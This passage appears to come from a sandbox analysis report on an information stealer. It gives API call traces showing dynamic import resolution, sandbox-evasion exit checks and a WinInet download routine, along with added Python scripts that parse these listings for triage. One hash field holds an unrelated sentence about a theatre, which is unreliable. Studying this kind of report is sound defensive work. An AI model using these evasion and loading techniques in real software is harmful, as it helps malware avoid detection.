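def resolved_imports_by_module(calls: list[ApiCall]) -> dict[str, dict]:
    """Group GetProcAddress calls by the module handle in their first argument.

    The report usually prints the function-name pointer as an address, so the
    per-handle count is the main signal; a readable name is kept only where the
    report recovered it (e.g. NtQueryInformationProcess).
    """
    by_handle: dict[str, dict] = defaultdict(lambda: {"count": 0, "names": []})
    for c in calls:
        if c.api != "GetProcAddress" or len(c.args) < 2:
            continue
        entry = by_handle[c.args[0]]
        entry["count"] += 1
        if not re.fullmatch(r"[0-9A-Fa-f]{8}|\?", c.args[1]):
            entry["names"].append(c.args[1])
    return dict(by_handle)


def find_exit_gates(calls: list[ApiCall]) -> list[tuple[str, int]]:
    """Return (probe_api, exit_ref) for every probe immediately followed by
    ExitProcess inside the same function: the "check, then bail out" chain
    the report flags as an evasive API chain."""
    gates = []
    for prev, cur in zip(calls, calls[1:]):
        if prev.api in PROBE_APIS and cur.api == "ExitProcess" and prev.subcall == cur.subcall:
            gates.append((prev.api, cur.ref))
    return gates


def summarize(text: str) -> dict:
    calls = parse_trace(text)
    return {
        "calls": len(calls),
        "load_library": sum(c.api == "LoadLibraryA" for c in calls),
        "imports": resolved_imports_by_module(calls),
        "exit_gates": find_exit_gates(calls),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_TRACE)
    print(f"{s['calls']} unique call sites, {s['load_library']} LoadLibraryA")
    for handle, info in s["imports"].items():
        print(f"  handle {handle}: {info['count']} GetProcAddress, names={info['names']}")
    for api, ref in s["exit_gates"]:
        print(f"  {api} -> ExitProcess at {ref:08X}")
```

Run against the full listings of this report rather than the constructed sample, the per-handle counts reproduce what the control-flow graphs already hint at (20 resolutions from one handle in 003B6390, 43 in 003B66E0), and the gate list is a compact statement of which checks the sandbox must pass before the stealer reaches its OpenEventA/CreateEventA single-instance logic and the real payload.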

                                 Control-flow Graph (basic blocks with the API calls they contain and their successor edges; the executed / not-executed colouring of the original graphic is not preserved in text)

                                 • 2850: 394a60-394afc RtlAllocateHeap -> 2867, 2868
                                 • 2867: 394b7a-394bbe VirtualProtect
                                 • 2868: 394afe-394b03 -> 2869
                                 • 2869: 394b06-394b78 -> 2867
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00394AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00394BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 9f6f2e08d4b64d01ae3da0df1f0b7fb86add0426eb1d69430c697715139c1ef4
                                • Instruction ID: c8bc3291207243752d7ad5f08c61b69670abedc8e0962ec493e16fb6f51187fd
                                • Opcode Fuzzy Hash: 9f6f2e08d4b64d01ae3da0df1f0b7fb86add0426eb1d69430c697715139c1ef4
                                • Instruction Fuzzy Hash: AC31F028B8423C769622EBEF4C67FDF6E55DF85BA0B02405AF448D7180CBB15C01CBA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 003B2A8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 272cefa2a1785e182c0e61769c60fe5ce1a9c4ff203373a2127a1df0429e502a
                                • Instruction ID: 6803c4045d84f989eb570572f6d232e9c1a553c43e14f5da9e4a4e2b48017651
                                • Opcode Fuzzy Hash: 272cefa2a1785e182c0e61769c60fe5ce1a9c4ff203373a2127a1df0429e502a
                                • Instruction Fuzzy Hash: 50F0B4B5A40A04AFC700DF88DD49F9EBBBCF704B21F000216FA15E3680D774190486A1

                                 Control-flow Graph (basic blocks with the API calls they contain and their successor edges; the executed / not-executed colouring of the original graphic is not preserved in text)

                                 • 633: 3b66e0-3b66e7 -> 634, 635
                                 • 634: 3b6afe-3b6b92 LoadLibraryA * 8 -> 636, 637
                                 • 635: 3b66ed-3b6af9 GetProcAddress * 43 -> 634
                                 • 636: 3b6c08-3b6c0f -> 638, 639
                                 • 637: 3b6b94-3b6c03 GetProcAddress * 5 -> 636
                                 • 638: 3b6cd2-3b6cd9 -> 640, 641
                                 • 639: 3b6c15-3b6ccd GetProcAddress * 8 -> 638
                                 • 640: 3b6cdb-3b6d4a GetProcAddress * 5 -> 641
                                 • 641: 3b6d4f-3b6d56 -> 642, 643
                                 • 642: 3b6de9-3b6df0 -> 644, 645
                                 • 643: 3b6d5c-3b6de4 GetProcAddress * 6 -> 642
                                 • 644: 3b6f10-3b6f17 -> 646, 647
                                 • 645: 3b6df6-3b6f0b GetProcAddress * 12 -> 644
                                 • 646: 3b6f19-3b6f88 GetProcAddress * 5 -> 647
                                 • 647: 3b6f8d-3b6f94 -> 648, 649
                                 • 648: 3b6fc1-3b6fc8 -> 650, 651
                                 • 649: 3b6f96-3b6fbc GetProcAddress * 2 -> 648
                                 • 650: 3b6fca-3b6ff0 GetProcAddress * 2 -> 651
                                 • 651: 3b6ff5-3b6ffc -> 652, 653
                                 • 652: 3b70ed-3b70f4 -> 654, 655
                                 • 653: 3b7002-3b70e8 GetProcAddress * 10 -> 652
                                 • 654: 3b7152-3b7159 -> 656, 657
                                 • 655: 3b70f6-3b714d GetProcAddress * 4 -> 654
                                 • 656: 3b715b-3b7169 GetProcAddress -> 657
                                 • 657: 3b716e-3b7175 -> 658, 659
                                 • 658: 3b71d3 (return)
                                 • 659: 3b7177-3b71ce GetProcAddress * 4 -> 658
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00F65388), ref: 003B66F5
                                • GetProcAddress.KERNEL32(76210000,00F65368), ref: 003B670D
                                • GetProcAddress.KERNEL32(76210000,00F79070), ref: 003B6726
                                • GetProcAddress.KERNEL32(76210000,00F78FE0), ref: 003B673E
                                • GetProcAddress.KERNEL32(76210000,00F79010), ref: 003B6756
                                • GetProcAddress.KERNEL32(76210000,00F7DFF0), ref: 003B676F
                                • GetProcAddress.KERNEL32(76210000,00F6A6A8), ref: 003B6787
                                • GetProcAddress.KERNEL32(76210000,00F7DF90), ref: 003B679F
                                • GetProcAddress.KERNEL32(76210000,00F7DFC0), ref: 003B67B8
                                • GetProcAddress.KERNEL32(76210000,00F7E050), ref: 003B67D0
                                • GetProcAddress.KERNEL32(76210000,00F7DF30), ref: 003B67E8
                                • GetProcAddress.KERNEL32(76210000,00F65688), ref: 003B6801
                                • GetProcAddress.KERNEL32(76210000,00F656E8), ref: 003B6819
                                • GetProcAddress.KERNEL32(76210000,00F653C8), ref: 003B6831
                                • GetProcAddress.KERNEL32(76210000,00F654A8), ref: 003B684A
                                • GetProcAddress.KERNEL32(76210000,00F7DF78), ref: 003B6862
                                • GetProcAddress.KERNEL32(76210000,00F7E038), ref: 003B687A
                                • GetProcAddress.KERNEL32(76210000,00F6A4F0), ref: 003B6893
                                • GetProcAddress.KERNEL32(76210000,00F65448), ref: 003B68AB
                                • GetProcAddress.KERNEL32(76210000,00F7DFA8), ref: 003B68C3
                                • GetProcAddress.KERNEL32(76210000,00F7DEE8), ref: 003B68DC
                                • GetProcAddress.KERNEL32(76210000,00F7DF60), ref: 003B68F4
                                • GetProcAddress.KERNEL32(76210000,00F7DF18), ref: 003B690C
                                • GetProcAddress.KERNEL32(76210000,00F65628), ref: 003B6925
                                • GetProcAddress.KERNEL32(76210000,00F7DFD8), ref: 003B693D
                                • GetProcAddress.KERNEL32(76210000,00F7E020), ref: 003B6955
                                • GetProcAddress.KERNEL32(76210000,00F7E008), ref: 003B696E
                                • GetProcAddress.KERNEL32(76210000,00F7DF00), ref: 003B6986
                                • GetProcAddress.KERNEL32(76210000,00F7DF48), ref: 003B699E
                                • GetProcAddress.KERNEL32(76210000,00F7E068), ref: 003B69B7
                                • GetProcAddress.KERNEL32(76210000,00F7E080), ref: 003B69CF
                                • GetProcAddress.KERNEL32(76210000,00F7DED0), ref: 003B69E7
                                • GetProcAddress.KERNEL32(76210000,00F7DAC8), ref: 003B6A00
                                • GetProcAddress.KERNEL32(76210000,00F6FE08), ref: 003B6A18
                                • GetProcAddress.KERNEL32(76210000,00F7DA08), ref: 003B6A30
                                • GetProcAddress.KERNEL32(76210000,00F7D9D8), ref: 003B6A49
                                • GetProcAddress.KERNEL32(76210000,00F653E8), ref: 003B6A61
                                • GetProcAddress.KERNEL32(76210000,00F7D960), ref: 003B6A79
                                • GetProcAddress.KERNEL32(76210000,00F65468), ref: 003B6A92
                                • GetProcAddress.KERNEL32(76210000,00F7DBB8), ref: 003B6AAA
                                • GetProcAddress.KERNEL32(76210000,00F7DAB0), ref: 003B6AC2
                                • GetProcAddress.KERNEL32(76210000,00F65568), ref: 003B6ADB
                                • GetProcAddress.KERNEL32(76210000,00F65488), ref: 003B6AF3
                                • LoadLibraryA.KERNEL32(00F7DA50,003B051F), ref: 003B6B05
                                • LoadLibraryA.KERNEL32(00F7D948), ref: 003B6B16
                                • LoadLibraryA.KERNEL32(00F7D8D0), ref: 003B6B28
                                • LoadLibraryA.KERNEL32(00F7D990), ref: 003B6B3A
                                • LoadLibraryA.KERNEL32(00F7D9A8), ref: 003B6B4B
                                • LoadLibraryA.KERNEL32(00F7D9C0), ref: 003B6B5D
                                • LoadLibraryA.KERNEL32(00F7D918), ref: 003B6B6F
                                • LoadLibraryA.KERNEL32(00F7D930), ref: 003B6B80
                                • GetProcAddress.KERNEL32(751E0000,00F651A8), ref: 003B6B9C
                                • GetProcAddress.KERNEL32(751E0000,00F7DB40), ref: 003B6BB4
                                • GetProcAddress.KERNEL32(751E0000,00F78A08), ref: 003B6BCD
                                • GetProcAddress.KERNEL32(751E0000,00F7DAE0), ref: 003B6BE5
                                • GetProcAddress.KERNEL32(751E0000,00F652C8), ref: 003B6BFD
                                • GetProcAddress.KERNEL32(700F0000,00F6A6D0), ref: 003B6C1D
                                • GetProcAddress.KERNEL32(700F0000,00F64F88), ref: 003B6C35
                                • GetProcAddress.KERNEL32(700F0000,00F6A518), ref: 003B6C4E
                                • GetProcAddress.KERNEL32(700F0000,00F7DAF8), ref: 003B6C66
                                • GetProcAddress.KERNEL32(700F0000,00F7DA98), ref: 003B6C7E
                                • GetProcAddress.KERNEL32(700F0000,00F65288), ref: 003B6C97
                                • GetProcAddress.KERNEL32(700F0000,00F64F48), ref: 003B6CAF
                                • GetProcAddress.KERNEL32(700F0000,00F7D900), ref: 003B6CC7
                                • GetProcAddress.KERNEL32(753A0000,00F65148), ref: 003B6CE3
                                • GetProcAddress.KERNEL32(753A0000,00F651C8), ref: 003B6CFB
                                • GetProcAddress.KERNEL32(753A0000,00F7D978), ref: 003B6D14
                                • GetProcAddress.KERNEL32(753A0000,00F7D9F0), ref: 003B6D2C
                                • GetProcAddress.KERNEL32(753A0000,00F651E8), ref: 003B6D44
                                • GetProcAddress.KERNEL32(76310000,00F6A568), ref: 003B6D64
                                • GetProcAddress.KERNEL32(76310000,00F6A5B8), ref: 003B6D7C
                                • GetProcAddress.KERNEL32(76310000,00F7DA20), ref: 003B6D95
                                • GetProcAddress.KERNEL32(76310000,00F65308), ref: 003B6DAD
                                • GetProcAddress.KERNEL32(76310000,00F65208), ref: 003B6DC5
                                • GetProcAddress.KERNEL32(76310000,00F6A5E0), ref: 003B6DDE
                                • GetProcAddress.KERNEL32(76910000,00F7DA38), ref: 003B6DFE
                                • GetProcAddress.KERNEL32(76910000,00F65268), ref: 003B6E16
                                • GetProcAddress.KERNEL32(76910000,00F78998), ref: 003B6E2F
                                • GetProcAddress.KERNEL32(76910000,00F7DA68), ref: 003B6E47
                                • GetProcAddress.KERNEL32(76910000,00F7DB10), ref: 003B6E5F
                                • GetProcAddress.KERNEL32(76910000,00F65328), ref: 003B6E78
                                • GetProcAddress.KERNEL32(76910000,00F650E8), ref: 003B6E90
                                • GetProcAddress.KERNEL32(76910000,00F7DB28), ref: 003B6EA8
                                • GetProcAddress.KERNEL32(76910000,00F7D8E8), ref: 003B6EC1
                                • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 003B6ED7
                                • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 003B6EEE
                                • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 003B6F05
                                • GetProcAddress.KERNEL32(75B30000,00F650C8), ref: 003B6F21
                                • GetProcAddress.KERNEL32(75B30000,00F7DA80), ref: 003B6F39
                                • GetProcAddress.KERNEL32(75B30000,00F7DB58), ref: 003B6F52
                                • GetProcAddress.KERNEL32(75B30000,00F7DB70), ref: 003B6F6A
                                • GetProcAddress.KERNEL32(75B30000,00F7DB88), ref: 003B6F82
                                • GetProcAddress.KERNEL32(75670000,00F64FA8), ref: 003B6F9E
                                • GetProcAddress.KERNEL32(75670000,00F652E8), ref: 003B6FB6
                                • GetProcAddress.KERNEL32(76AC0000,00F64F68), ref: 003B6FD2
                                • GetProcAddress.KERNEL32(76AC0000,00F7DBA0), ref: 003B6FEA
                                • GetProcAddress.KERNEL32(6F4E0000,00F65048), ref: 003B700A
                                • GetProcAddress.KERNEL32(6F4E0000,00F64FC8), ref: 003B7022
                                • GetProcAddress.KERNEL32(6F4E0000,00F65228), ref: 003B703B
                                • GetProcAddress.KERNEL32(6F4E0000,00F7DBD0), ref: 003B7053
                                • GetProcAddress.KERNEL32(6F4E0000,00F64FE8), ref: 003B706B
                                • GetProcAddress.KERNEL32(6F4E0000,00F65088), ref: 003B7084
                                • GetProcAddress.KERNEL32(6F4E0000,00F65108), ref: 003B709C
                                • GetProcAddress.KERNEL32(6F4E0000,00F65248), ref: 003B70B4
                                • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 003B70CB
                                • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 003B70E2
                                • GetProcAddress.KERNEL32(75AE0000,00F7DEA0), ref: 003B70FE
                                • GetProcAddress.KERNEL32(75AE0000,00F78A28), ref: 003B7116
                                • GetProcAddress.KERNEL32(75AE0000,00F7DE70), ref: 003B712F
                                • GetProcAddress.KERNEL32(75AE0000,00F7DE88), ref: 003B7147
                                • GetProcAddress.KERNEL32(76300000,00F652A8), ref: 003B7163
                                • GetProcAddress.KERNEL32(6E950000,00F7DCF0), ref: 003B717F
                                • GetProcAddress.KERNEL32(6E950000,00F650A8), ref: 003B7197
                                • GetProcAddress.KERNEL32(6E950000,00F7DE58), ref: 003B71B0
                                • GetProcAddress.KERNEL32(6E950000,00F7DC18), ref: 003B71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 811f377d0f540eea5ac99e24f67d5b994ecb5b883695606d3d5e118023e79084
                                • Instruction ID: d6e7867b91b49e507cc170b5927f16545271cf61b0a008cf66943eeb8dbcdc4f
                                • Opcode Fuzzy Hash: 811f377d0f540eea5ac99e24f67d5b994ecb5b883695606d3d5e118023e79084
                                • Instruction Fuzzy Hash: 6B623CB9611E00EFD754DF64EC8DE2637BAF7A87013148919E956E3364DB34A808FB60
                                APIs
                                • lstrlen.KERNEL32(003BCFEC), ref: 003AF1D5
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF1F1
                                • lstrlen.KERNEL32(003BCFEC), ref: 003AF1FC
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF215
                                • lstrlen.KERNEL32(003BCFEC), ref: 003AF220
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF239
                                • lstrcpy.KERNEL32(00000000,003C4FA0), ref: 003AF25E
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF28C
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF2C0
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF2F0
                                • lstrlen.KERNEL32(00F654C8), ref: 003AF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 6fae33698a67d2b06170101716f4d5bde988800badfaaa52a229e050b8a9966d
                                • Instruction ID: 067b2971872f6a0c37b63b4a941bd8d134e5ac91fb4aad0ced190a8ed6d6b0cf
                                • Opcode Fuzzy Hash: 6fae33698a67d2b06170101716f4d5bde988800badfaaa52a229e050b8a9966d
                                • Instruction Fuzzy Hash: 0CA27F70901A069FCB22DFA9D849E6AB7F4FF55314F1A8079E809DB261DB31DC46CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0013
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B00BD
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B00E1
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B00EC
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0110
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B011B
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B013F
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B015A
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0189
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B0194
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B01C3
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B01CE
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0206
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B0250
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B059B
                                • lstrlen.KERNEL32(00F65508), ref: 003B05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 003B05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B060E
                                • lstrlen.KERNEL32(00F7F568), ref: 003B0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B064C
                                • lstrcat.KERNEL32(00000000,?), ref: 003B0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B0681
                                • lstrlen.KERNEL32(00F65428), ref: 003B0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 003B06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B0706
                                • lstrcpy.KERNEL32(00000000,00F78A98), ref: 003B074B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B077F
                                • lstrcpy.KERNEL32(00000000,00F7F5F8), ref: 003B07E7
                                • lstrcpy.KERNEL32(00000000,00F78AB8), ref: 003B0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 003B08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B0928
                                • lstrcpy.KERNEL32(00000000,00F78C18), ref: 003B09F8
                                  • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 00392528
                                  • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 0039254E
                                  • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 00392577
                                • lstrcpy.KERNEL32(00000000,00F78AE8), ref: 003B0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B0B81
                                • lstrcpy.KERNEL32(00000000,00F78AE8), ref: 003B0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 5dfa2ac68dfce4f8803d60418ba9c6315b69cb2a06628df97b62e4fc6a73b195
                                • Instruction ID: 622cf737007ec87097d5021de7db22222cce05a7fd2e52fe4d09b88a3f294d2e
                                • Opcode Fuzzy Hash: 5dfa2ac68dfce4f8803d60418ba9c6315b69cb2a06628df97b62e4fc6a73b195
                                • Instruction Fuzzy Hash: 0CE28D71A053418FC736DF29C499BAAFBE0BF88308F5A856DD58D8B652DB30D845CB42

Control-flow Graph (rendered graph not reproduced; in the original, nodes are coloured Executed / Not Executed)

• Function 00396C40: entry block 396c40-396c64 calls 00392930; the main path is InternetOpenA + StrCmpCA (396cc8-396cf5) -> InternetConnectA (396d02-396d22) -> HttpOpenRequestA (396d28-396d5d) -> conditional InternetSetOptionA (396d67-396d77) -> HttpSendRequestA + HttpQueryInfoA (396d7d-396dad) -> InternetReadFile read loop (396dee-396e8b, with calls to 003B7310, 00392A20 and 00392930 per chunk) -> three InternetCloseHandle blocks (396e8d, 396e94-396e9e, 396ea1-396ea2) -> cleanup via 00392930 / 00392A20 (396ea8-396ee0). Failure of InternetConnectA or HttpOpenRequestA jumps straight to the InternetCloseHandle chain.
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00396C6F
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396CC2
                                • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396CD5
                                • StrCmpCA.SHLWAPI(?,00F7FC90), ref: 00396CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00396D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,00F7F610,00000000,00000000,-00400100,00000000), ref: 00396D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00396D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00396D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00396DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00396DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00396E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00396E7D
                                • InternetCloseHandle.WININET(00000000), ref: 00396E8E
                                • InternetCloseHandle.WININET(?), ref: 00396E98
                                • InternetCloseHandle.WININET(00000000), ref: 00396EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00396EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: 3db69fbaee61ad8a42e8244db203cd2799e42e54074dfb9a37242058ab8e7f2b
                                • Instruction ID: 32a4ea8aadd2889ff7ee7939f8349e168157ef850856e37cfeb25a7a878f7235
                                • Opcode Fuzzy Hash: 3db69fbaee61ad8a42e8244db203cd2799e42e54074dfb9a37242058ab8e7f2b
                                • Instruction Fuzzy Hash: 92818075E12615AFEF21DFA4DC4AFAE77B8AF44700F154058F905EB280DB70AD048B90
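Two of the function listings above are the ones an analyst usually wants to check by hand: the GetProcAddress/LoadLibraryA resolver (ref 003B69B7 onward), where most second arguments are rendered as bare hexadecimal values rather than export names, and the WinInet routine at 00396C40, which opens a GET request, calls InternetSetOptionA with option 0x1F, then reads the response in 0x7CF-byte chunks. The script below is an added example, not Joe Sandbox code and not part of this report: it parses lines in the report's "• Func.MODULE(args), ref: ADDR" format, tallies GetProcAddress calls per module handle split into named versus hex-only arguments, and checks whether the WinInet call order forms a complete GET chain that also sets INTERNET_OPTION_SECURITY_FLAGS before sending. The constants 0x1F (INTERNET_OPTION_SECURITY_FLAGS) and 0x13 (HTTP_QUERY_STATUS_CODE) are the documented wininet.h values, not taken from the report. The sample input is a handful of lines copied from the two listings; treating a hex-only GetProcAddress argument as "name not rendered as a string" (consistent with a run-time-built name, which the report's own "Extensive use of GetProcAddress" signature points at) is this example's interpretation, not a fact stated by the report.

```python
"""Parse Joe Sandbox-style API call listings and run two triage checks.

Added example; not Joe Sandbox code. SAMPLE is copied from the report's
listings. The WinInet constants are the documented <wininet.h> values.
"""
import re
from collections import defaultdict

# "• Func.MODULE(arg1,arg2,...), ref: ADDR"  (bullet optional)
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")  # an 8-digit value, i.e. no string rendered

INTERNET_OPTION_SECURITY_FLAGS = 0x1F  # documented wininet.h value
HTTP_QUERY_STATUS_CODE = 0x13          # documented wininet.h value

# Constructed sample: lines copied verbatim from the two listings in this report.
SAMPLE = """\
• GetProcAddress.KERNEL32(76910000,00F7D8E8), ref: 003B6EC1
• GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 003B6ED7
• GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 003B6EEE
• GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 003B6F05
• GetProcAddress.KERNEL32(6F4E0000,00F65248), ref: 003B70B4
• GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 003B70CB
• GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 003B70E2
• Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
• InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396CD5
• StrCmpCA.SHLWAPI(?,00F7FC90), ref: 00396CED
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00396D15
• HttpOpenRequestA.WININET(00000000,GET,?,00F7F610,00000000,00000000,-00400100,00000000), ref: 00396D50
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00396D77
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00396D86
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00396DA5
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00396DFF
• InternetCloseHandle.WININET(00000000), ref: 00396E8E
"""


def _hex(s):
    """Parse a listing argument as hex; None for '?' or names."""
    try:
        return int(s, 16)
    except ValueError:
        return None


def parse_listing(text):
    """Return one dict per direct API line; 'Part of subcall' lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({"func": m.group("func"), "module": m.group("module"),
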